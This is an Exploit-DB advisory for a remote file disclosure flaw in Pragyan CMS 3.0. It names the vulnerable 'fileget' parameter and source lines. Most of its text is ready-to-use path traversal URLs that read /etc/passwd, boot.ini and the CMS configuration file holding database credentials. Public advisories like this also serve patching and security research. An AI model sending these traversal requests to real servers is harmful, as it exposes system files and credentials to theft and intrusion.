Pragyan CMS 3.0 - Remote File Disclosure

EDB-ID:

18347




Platform:

PHP

Date:

2012-01-10


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Title    
Pragyan CMS v 3.0 => [Remote File Disclosure] 
Author   
Or4nG.M4n
Download 
http://space.dl.sourceforge.net/project/pragyan/pragyan/3.0/PragyanCMS-v3.0-beta.tar.bz2

vuln
download.lib.php line 16
vuln
index.php line 234

$_GET['fileget']
 
exploit  http://localhost/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../  etc/passwd . boot.ini

Download Config file 
exploit  /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../appserv/www/Pragyan/cms/config.inc.php
exploit  /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../home/exploitdb/public_html/Pragyan/cms/config.inc.php